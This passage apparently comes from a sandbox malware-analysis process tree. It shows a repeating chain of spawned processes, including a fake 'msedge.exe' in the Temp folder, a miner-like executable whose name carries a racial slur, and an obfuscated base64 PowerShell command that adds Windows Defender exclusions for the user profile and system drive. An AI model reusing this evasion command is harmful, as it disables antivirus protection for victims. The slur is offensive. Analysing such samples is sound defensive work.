        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="
        161⤵
        
        PID:4000
        
        C:\Users\Admin\AppData\Local\Temp\msedge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
        161⤵
        
        PID:1284
        
        C:\Users\Admin\AppData\Local\Temp\niggacoin.exe
        
        "C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"
        161⤵
        
        PID:3944
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="
        162⤵
        
        PID:4028
        
        C:\Users\Admin\AppData\Local\Temp\msedge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
        162⤵
        
        PID:2812
        
        C:\Users\Admin\AppData\Local\Temp\niggacoin.exe
        
        "C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"
        162⤵
        
        PID:3332
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="
        163⤵
        
        PID:3964
        
        C:\Users\Admin\AppData\Local\Temp\msedge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
        163⤵
        
        PID:3136
        
        C:\Users\Admin\AppData\Local\Temp\niggacoin.exe
        
        "C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"
        163⤵
        
        PID:760
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="
        164⤵
        
        PID:2172
        
        C:\Users\Admin\AppData\Local\Temp\msedge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
        164⤵
        
        PID:1716
        
        C:\Users\Admin\AppData\Local\Temp\niggacoin.exe
        
        "C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"
        164⤵
        
        PID:2472
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="
        165⤵
        
        PID:3460
        
        C:\Users\Admin\AppData\Local\Temp\msedge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
        165⤵
        
        PID:3180
        
        C:\Users\Admin\AppData\Local\Temp\niggacoin.exe
        
        "C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"
        165⤵
        
        PID:2020
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="
        166⤵
        
        PID:2064
        
        C:\Users\Admin\AppData\Local\Temp\msedge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
        166⤵
        
        PID:1428
        
        C:\Users\Admin\AppData\Local\Temp\niggacoin.exe
        
        "C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"
        166⤵
        
        PID:1932
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="
        167⤵
        
        PID:1280
        
        C:\Users\Admin\AppData\Local\Temp\msedge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
        167⤵
        
        PID:2604
        
        C:\Users\Admin\AppData\Local\Temp\niggacoin.exe
        
        "C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"
        167⤵
        
        PID:3576
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="
        168⤵
        
        PID:3516
        
        C:\Users\Admin\AppData\Local\Temp\msedge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
        168⤵
        
        PID:3824
        
        C:\Users\Admin\AppData\Local\Temp\niggacoin.exe
        
        "C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"
        168⤵
        
        PID:332
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="
        169⤵
        
        PID:3220
        
        C:\Users\Admin\AppData\Local\Temp\msedge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
        169⤵
        
        PID:2572
        
        C:\Users\Admin\AppData\Local\Temp\niggacoin.exe
        
        "C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"
        169⤵
        
        PID:3204
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="
        170⤵
        
        PID:3768
        
        C:\Users\Admin\AppData\Local\Temp\msedge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
        170⤵
        
        PID:2640
        
        C:\Users\Admin\AppData\Local\Temp\niggacoin.exe
        
        "C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"
        170⤵
        
        PID:3052
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="
        171⤵
        
        PID:3496
        
        C:\Users\Admin\AppData\Local\Temp\msedge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
        171⤵
        
        PID:1512
        
        C:\Users\Admin\AppData\Local\Temp\niggacoin.exe
        
        "C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"
        171⤵
        
        PID:3636
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="
        172⤵
        
        PID:680
        
        C:\Users\Admin\AppData\Local\Temp\msedge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
        172⤵
        
        PID:3892
        
        C:\Users\Admin\AppData\Local\Temp\niggacoin.exe
        
        "C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"
        172⤵
        
        PID:3360
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="
        173⤵
        
        PID:3828
        
        C:\Users\Admin\AppData\Local\Temp\msedge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
        173⤵
        
        PID:2428
        
        C:\Users\Admin\AppData\Local\Temp\niggacoin.exe
        
        "C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"
        173⤵
        
        PID:340
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="
        174⤵
        
        PID:3484
        
        C:\Users\Admin\AppData\Local\Temp\msedge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
        174⤵
        
        PID:2820
        
        C:\Users\Admin\AppData\Local\Temp\niggacoin.exe
        
        "C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"
        174⤵
        
        PID:3932
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="
        175⤵
        
        PID:2728
        
        C:\Users\Admin\AppData\Local\Temp\msedge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
        175⤵
        
        PID:3832
        
        C:\Users\Admin\AppData\Local\Temp\niggacoin.exe
        
        "C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"
        175⤵
        
        PID:2408
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="
        176⤵
        
        PID:3456
        
        C:\Users\Admin\AppData\Local\Temp\msedge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
        176⤵
        
        PID:3808
        
        C:\Users\Admin\AppData\Local\Temp\niggacoin.exe
        
        "C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"
        176⤵
        
        PID:2108
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="
        177⤵
        
        PID:2152
        
        C:\Users\Admin\AppData\Local\Temp\msedge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
        177⤵
        
        PID:3148
        
        C:\Users\Admin\AppData\Local\Temp\niggacoin.exe
        
        "C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"
        177⤵
        
        PID:3792
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="
        178⤵
        
        PID:1936
        
        C:\Users\Admin\AppData\Local\Temp\msedge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
        178⤵
        
        PID:3740
        
        C:\Users\Admin\AppData\Local\Temp\niggacoin.exe
        
        "C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"
        178⤵
        
        PID:2416
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="
        179⤵
        
        PID:3660
        
        C:\Users\Admin\AppData\Local\Temp\msedge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
        179⤵
        
        PID:1904
        
        C:\Users\Admin\AppData\Local\Temp\niggacoin.exe
        
        "C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"
        179⤵
        
        PID:476
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="
        180⤵
        
        PID:2944
        
        C:\Users\Admin\AppData\Local\Temp\msedge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
        180⤵
        
        PID:3116
        
        C:\Users\Admin\AppData\Local\Temp\niggacoin.exe
        
        "C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"
        180⤵
        
        PID:1700
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="
        181⤵
        
        PID:1028
        
        C:\Users\Admin\AppData\Local\Temp\msedge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
        181⤵
        
        PID:2844
        
        C:\Users\Admin\AppData\Local\Temp\niggacoin.exe
        
        "C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"
        181⤵
        
        PID:4084
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="
        182⤵
        
        PID:3468
        
        C:\Users\Admin\AppData\Local\Temp\msedge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
        182⤵
        
        PID:2828
        
        C:\Users\Admin\AppData\Local\Temp\niggacoin.exe
        
        "C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"
        182⤵
        
        PID:1588
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="
        183⤵
        
        PID:3424
        
        C:\Users\Admin\AppData\Local\Temp\msedge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
        183⤵
        
        PID:1664
        
        C:\Users\Admin\AppData\Local\Temp\niggacoin.exe
        
        "C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"
        183⤵
        
        PID:3356
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="
        184⤵
        
        PID:2644
        
        C:\Users\Admin\AppData\Local\Temp\msedge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
        184⤵
        
        PID:532
        
        C:\Users\Admin\AppData\Local\Temp\niggacoin.exe
        
        "C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"
        184⤵
        
        PID:1476
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="
        185⤵
        
        PID:1660
        
        C:\Users\Admin\AppData\Local\Temp\msedge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
        185⤵
        
        PID:316
        
        C:\Users\Admin\AppData\Local\Temp\niggacoin.exe
        
        "C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"
        185⤵
        
        PID:1052
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="
        186⤵
        
        PID:948
        
        C:\Users\Admin\AppData\Local\Temp\msedge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
        186⤵
        
        PID:3944
        
        C:\Users\Admin\AppData\Local\Temp\niggacoin.exe
        
        "C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"
        186⤵
        
        PID:1340
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="
        187⤵
        
        PID:3448
        
        C:\Users\Admin\AppData\Local\Temp\msedge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
        187⤵
        
        PID:1056
        
        C:\Users\Admin\AppData\Local\Temp\niggacoin.exe
        
        "C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"
        187⤵
        
        PID:3324
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="
        188⤵
        
        PID:3884
        
        C:\Users\Admin\AppData\Local\Temp\msedge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
        188⤵
        
        PID:416
        
        C:\Users\Admin\AppData\Local\Temp\niggacoin.exe
        
        "C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"
        188⤵
        
        PID:3988
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
